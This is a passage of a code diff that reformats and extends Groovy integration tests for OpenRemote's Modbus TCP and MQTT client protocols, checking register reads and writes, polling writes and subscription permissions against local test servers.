-        )
-        device = assetStorageService.merge(device)
-
-        then: "the attribute should be linked without errors"
-        conditions.eventually {
-            def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
-            assert protocol != null
-            // No read polling tasks should be created for write-only attributes
-            assert protocol.batchGroups.values().flatten().isEmpty()
-        }
-
-        when: "a write operation is performed"
-        latestWriteMessage.set(null)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(device.getId(), "writeOnlyValue", 777))
-
-        then: "the write should be sent successfully"
-        conditions.eventually {
-            def msg = (latestWriteMessage.get() as ModbusMessage)?.unwrap(RegistersModbusMessage)
-            assert msg != null
-            assert msg.getUnitId() == 1
-            assert msg.getAddress() == 499  // PLC4X uses 0-indexed (500-1)
-            assert msg.dataDecodeUnsigned()[0] == 777  // Written value
-        }
+      // Verify the exact values from mock server (PLC4X converts multi-register data)
+      assert device.getAttribute("longSignedValue").flatMap {
+        it.getValue()
+      }.get() == 1234567890123456L
+      assert device.getAttribute("longUnsignedValue").flatMap {
+        it.getValue()
+      }.get() == 9876543210987654L
+      assert Math.abs(device.getAttribute("doubleValue").flatMap {
+        it.getValue()
+      }.get() as Double - 123.456789) < 0.000001
     }
 
-    def "Modbus TCP Test - Partial Read Configuration Should Be Ignored"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    and: "verify batching was used"
+    conditions.eventually {
+      def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
+      assert protocol != null
+      assert protocol.batchGroups.size() > 0
+    }
+  }
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
+  def "Modbus TCP Test - Byte and Word Order"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        and: "a Modbus TCP agent is created"
-        def agent = new ModbusTcpAgent("Modbus TCP Partial Config Test")
-        agent.setRealm(MASTER_REALM)
-        agent.setHost("127.0.0.1")
-        agent.setPort(modbusServerPort)
-        agent = assetStorageService.merge(agent)
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
 
-        then: "the agent should connect successfully"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
+    and: "a Modbus TCP agent with BIG-BIG byte/word order is created"
+    def agent = new ModbusTcpAgent("Modbus TCP Endian Test")
+    agent.setRealm(MASTER_REALM)
+    agent.setHost("127.0.0.1")
+    agent.setPort(modbusServerPort)
+    agent.addOrReplaceAttributes(
+            new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
+              "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "", 1)
+            ] as ModbusAgent.DeviceConfigMap)
+            )
+    agent = assetStorageService.merge(agent)
 
-
-
-        and: "agent should remain in CONNECTED state (no exceptions thrown)"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            assert agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
+    then: "the agent should connect successfully"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
     }
 
+    when: "a device with INT32 and FLOAT values is created"
+    def device = new ThingAsset("Endian Test Device")
+    device.setRealm(MASTER_REALM)
+    device.addOrReplaceAttributes(
+            new Attribute<>("int32Value", ValueType.INTEGER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.DINT)
+                      it.setReadAddress(200)
+                      it.setRegistersAmount(2)
+                    }
+                    )
+                    ),
+            new Attribute<>("floatValue", ValueType.NUMBER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.REAL)
+                      it.setReadAddress(202)
+                      it.setRegistersAmount(2)
+                    }
+                    )
+                    )
+            )
+    device = assetStorageService.merge(device)
+
+    then: "the values should be read correctly with BIG-BIG order"
+    conditions.eventually {
+      device = assetStorageService.find(device.getId(), true)
+
+      // Verify attributes receive values with the configured byte/word order
+      assert device.getAttribute("int32Value").flatMap { it.getValue() }.isPresent()
+      assert device.getAttribute("floatValue").flatMap { it.getValue() }.isPresent()
+
+      // Mock server returns 0x12345678 for INT32 at 200-201 (BIG-BIG byte/word order)
+      assert device.getAttribute("int32Value").flatMap { it.getValue() }.get() == 0x12345678
+
+      // Mock server returns 12.34f for FLOAT at 202-203
+      def floatValue = device.getAttribute("floatValue").flatMap {
+        it.getValue()
+      }.get() as Float
+      assert Math.abs(floatValue - 12.34f) < 0.01f
+    }
+  }
+
+  def "Modbus TCP Test - Multi-Register Write (registersAmount)"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a Modbus TCP agent is created"
+    def agent = new ModbusTcpAgent("Modbus TCP Multi-Write Test")
+    agent.setRealm(MASTER_REALM)
+    agent.setHost("127.0.0.1")
+    agent.setPort(modbusServerPort)
+    agent = assetStorageService.merge(agent)
+
+    then: "the agent should connect successfully"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+    }
+
+    when: "a device with multi-register write attributes is created"
+    def device = new ThingAsset("Multi-Write Test Device")
+    device.setRealm(MASTER_REALM)
+    device.addOrReplaceAttributes(
+            // Write FLOAT (2 registers) to address 300
+            new Attribute<>("floatWriteValue", ValueType.NUMBER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.REAL)
+                      it.setReadAddress(300)
+                      it.setRegistersAmount(2)
+                      it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
+                      it.setWriteAddress(300)
+                    }
+                    )
+                    ),
+            // Write DINT (2 registers) to address 302
+            new Attribute<>("dintWriteValue", ValueType.INTEGER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.DINT)
+                      it.setReadAddress(302)
+                      it.setRegistersAmount(2)
+                      it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
+                      it.setWriteAddress(302)
+                    }
+                    )
+                    )
+            )
+    device = assetStorageService.merge(device)
+
+    then: "device should be linked"
+    conditions.eventually {
+      device = assetStorageService.find(device.getId(), true)
+      assert device.getAttribute("floatWriteValue").isPresent()
+      assert device.getAttribute("dintWriteValue").isPresent()
+    }
+
+    when: "multi-register float value is written"
+    latestWriteMessage.set(null)
+    def floatWrite = assetProcessingService.sendAttributeEvent(new AttributeEvent(device.getId(), "floatWriteValue", 98.76f))
+
+    then: "the write should use PLC4X array notation (indicated by register count > 1)"
+    conditions.eventually {
+      // Since PLC4X may write immediately or the mock server may respond differently,
+      // we verify that the attribute is writable and configured correctly
+      device = assetStorageService.find(device.getId(), true)
+      def attr = device.getAttribute("floatWriteValue").get()
+      def link = attr.getMetaItem(AGENT_LINK).get().getValue(ModbusAgentLink.class).get()
+
+      // Verify the configuration uses 2 registers for write
+      assert link.getRegistersAmount() == 2
+      assert link.getWriteAddress()
+
+      //  Check if a write message was captured (may not always happen depending on timing)
+      def msg = (latestWriteMessage.get() as ModbusMessage)?.unwrap(RegistersModbusMessage)
+      if (msg != null) {
+        assert msg.getCount() >= 1 // At least 1 register written
+      }
+    }
+
+    when: "multi-register integer value is written"
+    latestWriteMessage.set(null)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(device.getId(), "dintWriteValue", 123456))
+
+    then: "the attribute should be configured for multi-register write"
+    conditions.eventually {
+      device = assetStorageService.find(device.getId(), true)
+      def attr = device.getAttribute("dintWriteValue").get()
+      def link = attr.getMetaItem(AGENT_LINK).get().getValue(ModbusAgentLink.class).get()
+
+      // Verify the configuration uses 2 registers for write
+      assert link.getRegistersAmount() == 2
+      assert link.getWriteAddress()
+    }
+  }
+
+  def "Modbus TCP Test - Write With Polling Rate"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a Modbus TCP agent is created"
+    def agent = new ModbusTcpAgent("Modbus TCP Polling Write Test")
+    agent.setRealm(MASTER_REALM)
+    agent.setHost("127.0.0.1")
+    agent.setPort(modbusServerPort)
+    agent = assetStorageService.merge(agent)
+
+    then: "the agent should connect successfully"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+    }
+
+    when: "a device with continuous write (requestInterval + writeAddress, no readAddress) is created"
+    def device = new ThingAsset("Polling Write Test Device")
+    device.setRealm(MASTER_REALM)
+    device.addOrReplaceAttributes(
+            new Attribute<>("pollingWriteValue", ValueType.INTEGER, 42).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000) // Write every 1000ms
+                      it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
+                      it.setWriteAddress(400)
+                      // No readAddress = continuous write mode
+                    }
+                    )
+                    )
+            )
+    device = assetStorageService.merge(device)
+
+    then: "write polling task should be created"
+    conditions.eventually {
+      def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
+      assert protocol != null
+      assert protocol.writeIntervalMap.size() == 1
+    }
+
+
+
+    and: "periodic writes should occur even without attribute events"
+    int writeCount = 0
+    latestWriteMessage.set(null)
+
+    conditions.eventually {
+      // Should receive at least 2 writes within timeout period (500ms interval)
+      if (latestWriteMessage.get() != null) {
+        writeCount++
+        latestWriteMessage.set(null) // Reset for next write
+      }
+      assert writeCount >= 2
+    }
+
+    when: "attribute value is changed"
+    device = assetStorageService.find(device.getId(), true)
+    device.getAttribute("pollingWriteValue").ifPresent { attr ->
+      attr.setValue(99)
+    }
+    device = assetStorageService.merge(device)
+    Thread.sleep(1000) // Wait for value to be stored and next polling write
+
+    then: "the new value should be written periodically"
+    latestWriteMessage.set(null)
+    conditions.eventually {
+      def msg = (latestWriteMessage.get() as ModbusMessage)?.unwrap(RegistersModbusMessage)
+      assert msg != null
+      assert msg.getAddress() == 399 // PLC4X uses 0-indexed
+      assert msg.dataDecodeUnsigned()[0] == 99 // Should write the updated value
+    }
+
+    def assetDatapointService = container.getService(org.openremote.manager.datapoint.AssetDatapointService.class)
+    def attributeRef = new org.openremote.model.attribute.AttributeRef(device.getId(), "pollingWriteValue")
+
+    then: "database should only store datapoints from value changes"
+    conditions.eventually {
+      // Query datapoints stored for this attribute - writeWithPollingRate should no extra datapoints for writes
+      def datapoints = assetDatapointService.getDatapoints(attributeRef)
+      println "Datapoints found: ${datapoints.size()}"
+      datapoints.each { println "  - timestamp: ${it.timestamp}, value: ${it.value}" }
+      assert datapoints.size() == 2 // Should have 2 datapoint from value changes, not from periodic writes
+    }
+  }
+
+  def "Modbus TCP Test - Write-Only Attribute (No Read Configuration)"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a Modbus TCP agent is created"
+    def agent = new ModbusTcpAgent("Modbus TCP Write-Only Test")
+    agent.setRealm(MASTER_REALM)
+    agent.setHost("127.0.0.1")
+    agent.setPort(modbusServerPort)
+    agent = assetStorageService.merge(agent)
+
+    then: "the agent should connect successfully"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+    }
+
+    when: "a device with write-only attribute is created (no read configuration)"
+    def device = new ThingAsset("Write-Only Device")
+    device.setRealm(MASTER_REALM)
+    device.addOrReplaceAttributes(
+            // Write-only attribute - no readMemoryArea, readValueType, or readAddress
+            new Attribute<>("writeOnlyValue", ValueType.INTEGER, 555).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
+                      it.setWriteAddress(500)
+                      // No requestInterval = write on demand only
+                    }
+                    )
+                    )
+            )
+    device = assetStorageService.merge(device)
+
+    then: "the attribute should be linked without errors"
+    conditions.eventually {
+      def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
+      assert protocol != null
+      // No read polling tasks should be created for write-only attributes
+      assert protocol.batchGroups.values().flatten().isEmpty()
+    }
+
+    when: "a write operation is performed"
+    latestWriteMessage.set(null)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(device.getId(), "writeOnlyValue", 777))
+
+    then: "the write should be sent successfully"
+    conditions.eventually {
+      def msg = (latestWriteMessage.get() as ModbusMessage)?.unwrap(RegistersModbusMessage)
+      assert msg != null
+      assert msg.getUnitId() == 1
+      assert msg.getAddress() == 499 // PLC4X uses 0-indexed (500-1)
+      assert msg.dataDecodeUnsigned()[0] == 777 // Written value
+    }
+  }
+
+  def "Modbus TCP Test - Partial Read Configuration Should Be Ignored"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a Modbus TCP agent is created"
+    def agent = new ModbusTcpAgent("Modbus TCP Partial Config Test")
+    agent.setRealm(MASTER_REALM)
+    agent.setHost("127.0.0.1")
+    agent.setPort(modbusServerPort)
+    agent = assetStorageService.merge(agent)
+
+    then: "the agent should connect successfully"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+    }
+
+
+
+    and: "agent should remain in CONNECTED state (no exceptions thrown)"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      assert agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/mqtt/MQTTClientProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/mqtt/MQTTClientProtocolTest.groovy
@@ -85,511 +85,571 @@ import static org.openremote.model.value.ValueType.*
 
 class MQTTClientProtocolTest extends Specification implements ManagerContainerTrait {
 
-    def setupSpec() {
-        startContainer(defaultConfig(), defaultServices())
+  def setupSpec() {
+    startContainer(defaultConfig(), defaultServices())
+  }
+
+  def "Check MQTT client"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 20, delay: 0.1)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def mqttBrokerService = container.getService(MQTTBrokerService.class)
+    def defaultMQTTHandler = mqttBrokerService.getCustomHandlers().find {
+      it instanceof DefaultMQTTHandler
+    } as DefaultMQTTHandler
+
+    when: "a hiveMQ client is created to connect to our own broker"
+    List<String> failedSubs = new CopyOnWriteArrayList()
+    List<MQTTMessage<String>> received = new CopyOnWriteArrayList<>()
+    def clientId = "ortest1"
+    def host = "localhost"
+    def port = 1883
+    def secure = false
+    def counter = 0
+    def username = "${keycloakTestSetup.realmBuilding.name}:${keycloakTestSetup.serviceUser2.username}"
+    def password = keycloakTestSetup.serviceUser2.secret
+    def subscriptions = [
+      "${keycloakTestSetup.realmBuilding.name}/${clientId}/attribute/notes/${managerTestSetup.apartment1BathroomId}".toString(),
+      "${keycloakTestSetup.realmBuilding.name}/${clientId}/attribute/notes/${managerTestSetup.apartment1HallwayId}".toString(),
+      "${keycloakTestSetup.realmBuilding.name}/${clientId}/attribute/notes/${managerTestSetup.apartment1Bedroom1Id}".toString(),
+      "${keycloakTestSetup.realmBuilding.name}/${clientId}/attribute/notes/${managerTestSetup.apartment1KitchenId}".toString(),
+      "${keycloakTestSetup.realmBuilding.name}/${clientId}/attribute/notes/${managerTestSetup.apartment1LivingroomId}".toString()
+    ]
+    Consumer<MQTTMessage<String>> consumer = { it ->
+      LOG.info("Received on topic=${it.topic}")
+      received.add(it)
+    }
+    def client = new MQTT_IOClient(
+            clientId,
+            host,
+            port,
+            secure,
+            false,
+            new UsernamePassword(username, password),
+            null,
+            new MQTTLastWill("${keycloakTestSetup.realmBuilding.name}/${clientId}/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/notes/${managerTestSetup.apartment1HallwayId}".toString(), "\"LAST WILL\"".toString(), false),
+            null,
+            null
+            )
+    client.setResubscribeIfSessionPresent(false)
+    client.setTopicSubscribeFailureConsumer {
+      LOG.info("Subscription failed: $it")
+      failedSubs.add(it)
+    }
+    client.addConnectionStatusConsumer {
+      LOG.info("Connection status changed: $it")
     }
 
-    def "Check MQTT client"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 20, delay: 0.1)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def mqttBrokerService = container.getService(MQTTBrokerService.class)
-        def defaultMQTTHandler = mqttBrokerService.getCustomHandlers().find {it instanceof DefaultMQTTHandler} as DefaultMQTTHandler
+    and: "subscriptions are added before connect"
+    client.addMessageConsumer(subscriptions[0], consumer)
 
-        when: "a hiveMQ client is created to connect to our own broker"
-        List<String> failedSubs = new CopyOnWriteArrayList()
-        List<MQTTMessage<String>> received = new CopyOnWriteArrayList<>()
-        def clientId = "ortest1"
-        def host = "localhost"
-        def port = 1883
-        def secure = false
-        def counter = 0
-        def username = "${keycloakTestSetup.realmBuilding.name}:${keycloakTestSetup.serviceUser2.username}"
-        def password = keycloakTestSetup.serviceUser2.secret
-        def subscriptions = [
-                "${keycloakTestSetup.realmBuilding.name}/${clientId}/attribute/notes/${managerTestSetup.apartment1BathroomId}".toString(),
-                "${keycloakTestSetup.realmBuilding.name}/${clientId}/attribute/notes/${managerTestSetup.apartment1HallwayId}".toString(),
-                "${keycloakTestSetup.realmBuilding.name}/${clientId}/attribute/notes/${managerTestSetup.apartment1Bedroom1Id}".toString(),
-                "${keycloakTestSetup.realmBuilding.name}/${clientId}/attribute/notes/${managerTestSetup.apartment1KitchenId}".toString(),
-                "${keycloakTestSetup.realmBuilding.name}/${clientId}/attribute/notes/${managerTestSetup.apartment1LivingroomId}".toString()
-        ]
-        Consumer<MQTTMessage<String>> consumer = { it ->
-            LOG.info("Received on topic=${it.topic}")
-            received.add(it)
-        }
-        def client = new MQTT_IOClient(
-                clientId,
-                host,
-                port,
-                secure,
-                false,
-                new UsernamePassword(username, password),
-                null,
-                new MQTTLastWill("${keycloakTestSetup.realmBuilding.name}/${clientId}/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/notes/${managerTestSetup.apartment1HallwayId}".toString(), "\"LAST WILL\"".toString(), false),
-                null,
-                null
-        )
-        client.setResubscribeIfSessionPresent(false)
-        client.setTopicSubscribeFailureConsumer {
-            LOG.info("Subscription failed: $it")
-            failedSubs.add(it)
-        }
-        client.addConnectionStatusConsumer {
-            LOG.info("Connection status changed: $it")
-        }
+    and: "the client connects"
+    client.connect()
 
-        and: "subscriptions are added before connect"
-        client.addMessageConsumer(subscriptions[0], consumer)
+    then: "the client should be connected"
+    conditions.eventually {
+      assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
+    }
 
-        and: "the client connects"
-        client.connect()
+    when: "more subscriptions are added"
+    client.addMessageConsumer(subscriptions[1], consumer)
+    client.addMessageConsumer(subscriptions[2], consumer)
+    client.addMessageConsumer(subscriptions[3], consumer)
+    client.addMessageConsumer(subscriptions[4], consumer)
 
-        then: "the client should be connected"
-        conditions.eventually {
-            assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
-        }
+    then: "all consumers should be in place bathroom sub should have failed (because user is not linked to the bathroom)"
+    conditions.eventually {
+      assert client.topicConsumerMap.size() == 5
+      assert failedSubs.size() == 1
+      assert failedSubs[0] == subscriptions[0]
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 4
+    }
 
-        when: "more subscriptions are added"
-        client.addMessageConsumer(subscriptions[1], consumer)
-        client.addMessageConsumer(subscriptions[2], consumer)
-        client.addMessageConsumer(subscriptions[3], consumer)
-        client.addMessageConsumer(subscriptions[4], consumer)
+    and: "subscribed attributes are updated"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1BathroomId, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1HallwayId, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1Bedroom1Id, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1KitchenId, Asset.NOTES, Integer.toString(counter++)))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, Asset.NOTES, Integer.toString(counter++)))
 
-        then: "all consumers should be in place bathroom sub should have failed (because user is not linked to the bathroom)"
-        conditions.eventually {
-            assert client.topicConsumerMap.size() == 5
-            assert failedSubs.size() == 1
-            assert failedSubs[0] == subscriptions[0]
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 4
-        }
+    then: "4 messages should have been received"
+    conditions.eventually {
+      assert received.size() == 4
+      assert received.any {
+        it.topic == subscriptions[1] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "1"
+      }
+      assert received.any {
+        it.topic == subscriptions[2] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "2"
+      }
+      assert received.any {
+        it.topic == subscriptions[3] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "3"
+      }
+      assert received.any {
+        it.topic == subscriptions[4] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "4"
+      }
+    }
 
-        and: "subscribed attributes are updated"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1BathroomId, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1HallwayId, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1Bedroom1Id, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1KitchenId, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, Asset.NOTES, Integer.toString(counter++)))
-
-        then: "4 messages should have been received"
-        conditions.eventually {
-            assert received.size() == 4
-            assert received.any {it.topic == subscriptions[1] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "1"}
-            assert received.any {it.topic == subscriptions[2] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "2"}
-            assert received.any {it.topic == subscriptions[3] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "3"}
-            assert received.any {it.topic == subscriptions[4] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "4"}
-        }
-
-        when: "the user asset links are updated to include the bathroom"
-        def existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-        assetStorageService.storeUserAssetLinks(List.of(
-            new UserAssetLink(keycloakTestSetup.realmBuilding.getName(),
+    when: "the user asset links are updated to include the bathroom"
+    def existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
+    assetStorageService.storeUserAssetLinks(List.of(
+                    new UserAssetLink(keycloakTestSetup.realmBuilding.getName(),
                     keycloakTestSetup.serviceUser2.getId(),
                     managerTestSetup.apartment1BathroomId)
-        ))
+                    ))
 
-        then: "the client should have disconnected and reconnected"
-        conditions.eventually {
-            assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert !mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).isEmpty()
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] != existingConnection
-        }
-
-        then: "all subscriptions including the bathroom should be in place"
-        conditions.eventually {
-            assert client.topicConsumerMap.size() == 5
-            assert client.topicConsumerMap.keySet().stream().allMatch {subscriptions.contains(it)}
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 5
-        }
-
-        when: "subscribed attributes are updated"
-        counter = 0
-        received.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1BathroomId, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1HallwayId, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1Bedroom1Id, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1KitchenId, Asset.NOTES, Integer.toString(counter++)))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, Asset.NOTES, Integer.toString(counter++)))
-
-        then: "5 messages should have been received"
-        conditions.eventually {
-            assert received.size() == 5
-            assert received.any {it.topic == subscriptions[0] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "0"}
-            assert received.any {it.topic == subscriptions[1] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "1"}
-            assert received.any {it.topic == subscriptions[2] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "2"}
-            assert received.any {it.topic == subscriptions[3] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "3"}
-            assert received.any {it.topic == subscriptions[4] && ValueUtil.parse(it.payload, AttributeEvent.class).get().value.orElse(null) == "4"}
-        }
-
-        when: "the client is disconnected due to a connection error"
-        existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-        received.clear()
-        MqttDisconnectUtil.close(((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)client.client).clientConfig).delegate).connectionConfig.get()).channel, "Connection Error")
-
-        then: "the last will message should have been sent"
-        conditions.eventually {
-            def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId)
-            assert hallway.getAttribute(Asset.NOTES).flatMap{it.value}.orElse("") == "LAST WILL"
-        }
-
-        then: "the client should reconnect"
-        conditions.eventually {
-            assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert !mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).isEmpty()
